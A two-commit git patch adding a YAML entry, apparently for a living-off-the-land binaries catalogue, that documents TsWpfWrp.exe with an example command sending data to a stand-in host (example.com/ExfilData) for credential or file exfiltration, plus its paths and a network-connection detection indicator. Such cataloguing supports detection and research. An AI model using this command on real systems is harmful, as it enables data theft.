From 20ea9d337915cefe8f7191695f4214794e1578d8 Mon Sep 17 00:00:00 2001
From: Avihay Eldad <46644022+avihayeldad@users.noreply.github.com>
Date: Thu, 25 Apr 2024 14:05:30 +0300
Subject: [PATCH 1/2] Add files via upload

---
 yml/OSBinaries/TsWpfWrp.yml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 yml/OSBinaries/TsWpfWrp.yml

diff --git a/yml/OSBinaries/TsWpfWrp.yml b/yml/OSBinaries/TsWpfWrp.yml
new file mode 100644
index 00000000..a6786b58
--- /dev/null
+++ b/yml/OSBinaries/TsWpfWrp.yml
@@ -0,0 +1,24 @@
+---
+Name: TsWpfWrp.exe
+Description: Windows Presentation Foundation Terminal Server Print Wrapper
+Author: Avihay Eldad
+Created: 2024-04-25
+Commands:
+  - Command: TsWpfWrp.exe http://example.com/ExfilData blabla
+    Description: Upload file, credentials or data exfiltration in general
+    Usecase: Exfilitrate data to remote server
+    Category: Upload
+    Privileges: User
+    MitreID: T1567
+    OperatingSystem: Windows
+Full_Path:
+  - Path: C:\Windows\System32\TsWpfWrp.exe
+  - Path: C:\Windows\SysWOW64\TsWpfWrp.exe
+Detection:
+  - IOC: TsWpfWrp making unexpected network connections or DNS requests
+Acknowledgement:
+  - Person: Avihay Eldad
+    Handle: '@AvihayEldad'
+  - Person: Sagi Dinar
+    Handle: '@DinarSagi'
+    
\ No newline at end of file

From 774dd7e0e0e86f43315d6e34d7000853c522a65e Mon Sep 17 00:00:00 2001
From: Avihay Eldad <46644022+avihayeldad@users.noreply.github.com>
Date: Thu, 25 Apr 2024 14:16:14 +0300
Subject: [PATCH 2/2] Update TsWpfWrp.yml

---
 yml/OSBinaries/TsWpfWrp.yml | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/yml/OSBinaries/TsWpfWrp.yml b/yml/OSBinaries/TsWpfWrp.yml
index a6786b58..bfad442f 100644
--- a/yml/OSBinaries/TsWpfWrp.yml
+++ b/yml/OSBinaries/TsWpfWrp.yml
@@ -5,8 +5,8 @@ Author: Avihay Eldad
 Created: 2024-04-25
 Commands:
   - Command: TsWpfWrp.exe http://example.com/ExfilData blabla
-    Description: Upload file, credentials or data exfiltration in general
-    Usecase: Exfilitrate data to remote server
+    Description: Upload file, credentials, or data exfiltration in general
+    Usecase: Exfiltrate data to a remote server
     Category: Upload
     Privileges: User
     MitreID: T1567
@@ -21,4 +21,3 @@ Acknowledgement:
     Handle: '@AvihayEldad'
   - Person: Sagi Dinar
     Handle: '@DinarSagi'
-    
\ No newline at end of file